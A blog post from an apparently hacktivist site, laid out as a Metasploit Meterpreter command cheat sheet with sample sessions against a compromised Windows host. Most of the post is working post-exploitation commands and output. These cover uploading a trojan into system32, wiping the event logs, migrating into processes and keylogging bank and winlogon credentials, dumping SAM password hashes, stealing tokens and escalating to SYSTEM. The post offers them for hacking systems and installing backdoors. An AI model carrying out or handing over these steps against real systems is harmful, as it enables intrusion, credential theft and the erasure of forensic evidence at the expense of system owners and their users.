Vol.08--No.2019
The nAbAt a ICC soApboX
Tuesday,Aug 20,2019 
6 Users Online
Hacking Tools: Metasploit | By Anonymous | July 30, 2019 - 16:03 | Posted in CyberGuerrilla | No Comments

 

Metasploit

Metasploit can be used from the command line and can also be used for hacking a system. meterpreter is a Linux terminal on the remote computer. Many basic Linux commands can be used on the meterpreter, also on a Windows or other operating system.

Core commands

These are the so-called Core Commands:

Command Meaning
? Help menu.
background Move current session to the background to get back to the msf prompt or access other sessions.

Return to the session using:

meterpreter > session -i <session #>
bgkill Kill a meterpreter script running in the background.
bglist List all scripts running in the background.
bgrun Runs a script as a background thread.
migrate Move active process to a designated PID. Useful for migrating the shell out of a low level process, to a process with a higher level access.

Find the PID# of a useful process and use

meterpreter > migrate <PID#>
run Run the meterpreter script that follows.
channel List active channels.
read Read data from a channel.
write Write data to a channel.
interact Interact with a channel.
close Close a channel.
exit Exit a meterpreter session.
quit Terminate the meterpreter session.
use Load a meterpreter extension.
irb Go into Ruby scripting mode.

For more, see the MSFconsole Core Commands Tutorial by Offensive Security.

File system commands

Once having a meterpreter shell running, the file system commands allow for interacting with the the local and remote filesystem.

ls List files in current directory.
meterpreter > ls

Listing: C:\Documents and Settings\remote
=========================================

Mode              Size     Type  Last modified                   Name
----              ----     ----  -------------                   ----
40777/rwxrwxrwx   0        dir   Wed Jan 10 08:21:10 -0600 2018  .
40777/rwxrwxrwx   0        dir   Mon Feb 26 14:44:00 -0600 2018  ..
100666/rw-rw-rw-  218      fil   Mon Sep 10 01:13:54 -0600 2018  .recently-used.xbel
40555/r-xr-xr-x   0        dir   Wed Jun 13 10:12:21 -0700 2018  Application Data
...snip...
cat Read contents of a file and write to stdout.
meterpreter > cat edit.txt
Whatever text is in the edit.txt file

When receiving a Meterpreter shell, the local working directory is the location where one started the Metasploit console. Changing the working directory will give your Meterpreter session access to files located in this folder.

getwd Print working directory.
pwd Print working directory.
cd Change directory on remote machine.
meterpreter > pwd
c:\
meterpreter > cd c:\windows
meterpreter > pwd
c:\windows
meterpreter >
edit Edit a file with vim.
meterpreter > edit edit.txt
del Delete a file on the remote machine.
download Download a file from remote system to local system.
meterpreter > download c:\\boot.ini
upload Upload a file from local system to remote machine
meterpreter > upload some_trojan_code.exe c:\\windows\\system32
[*] uploading  : some_trojan_code.exe -> c:\windows\system32
[*] uploaded   : some_trojan_code.exe -> c:\windows\system32\some_trojan_code.exe
meterpreter >  
lpwd List local directory.
getlwd Print local directory.
lcd Change local directory.
meterpreter > lpwd
/root
meterpreter > lcd /var/www
meterpreter > lpwd
/var/www
meterpreter > 
mkdir Make a directory on remote system.
rm Remove (delete) a file.
rmdir Remove directory on remote system.
timestomp Modify, access, and create attributes of a file

Basic system commands

sysinfo Get details about the remote machine such as OS and name.
getuid Get the user ID that the meterpreter server is running as on the host.
meterpreter > getuid
shell Open a command shell on the remote machine.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
execute Execute a command.
meterpreter > execute -f cmd.exe -i -H
ps List running processes.
getpid Get the current shell process ID (PID).
getprivs Get as many privileges as possible.
kill Kill the process designated by the PID.
reg Interact with the registry of the remote Windows machine.
rev2self Call RevertToSelf() on the remote Windows machine to terminate the impersonation of a client application.
steal_token Try to steal the token of a specified (PID) process.
drop_token Drop a stolen token.
clearev Clear Application, System, and Security logs on the remote Windows machine.
meterpreter > clearev
[*] Wiping 122 records from Application...
[*] Wiping 815 records from System...
[*] Wiping 0 records from Security...
meterpreter >
reboot Reboot the remote machine.
shutdown Shut down the remote computer.

User interface

After having gained access to a system there are two approaches: smash and grab or low and slow. The latter can lead to a ton of useful information (passwords, user accounts). The keylogger tool allows for capturing all keyboard input from the system, without writing anything to disk and leaving a minimal forensic footprint.

keyscan_start Start software keylogger when associated with a process such as Word or a browser
keyscan_stop Stop the software keylogger
keyscan_dump Dump the contents of the software keylogger
meterpreter > ps

Process list
============

    PID   Name               Path                                                   
    ---   ----               ----                                                   
    
...snip...
    768   Explorer.exe       C:\WINNT\Explorer.exe
...snip...
meterpreter > migrate 768
[*] Migrating to 768...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 768
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
   somebank.com username password

For capturing system login information, migrate to the winlogon process instead. This will capture the credentials of all users logging into the system for as long as this is running.

idletime Display the number of seconds that the user at the remote machine has been idle.
meterpreter > idletime
User has been idle for: 12 hours 17 mins 56 secs
meterpreter >

Password dumping

hashdump Dump the contents of the SAM database.
meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 112233445566778899eeeeeeeeeee...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxXxx:yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy:::
Guest:501:zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
meterpreter >
powerdump Use PowerShell to extract username and password hashes through registry keys. This script requires running as SYSTEM to work.

Privilege escalation

Having limited user rights can severely limit actions on the remote system such as for dumping passwords, manipulating the registry, installing backdoors, andsoforth. Metasploit has a script called getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.

getsystem Use 15 built-in methods to gain sysadmin privileges
meterpreter > getuid
Server username: SOMETHINGUNUSEFUL\user
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:

    -h        Help Banner.
    -t <opt>  The technique to use. (Default to '0').
		0 : All techniques available
		1 : Service - Named Pipe Impersonation (In Memory/Admin)
		2 : Service - Named Pipe Impersonation (Dropper/Admin)
		3 : Service - Token Duplication (In Memory/Admin)


meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Or

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter >

There are also other (local) exploits that can be used to escalate privileges if getsystem fails. The available exploits change over time.

 

 

 

 

 

 



This Post is Tagged with:

Leave a Comment (Anonymous).

Comment author must fill out name and e-mail. (Email will not be published).

NOTE - You can use these (HTML tags and attributes):

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Whoever you are, we are ungovernable! Whoever lays his hand on us to govern us, is a usurper and tyrant, and we declare you our enemy.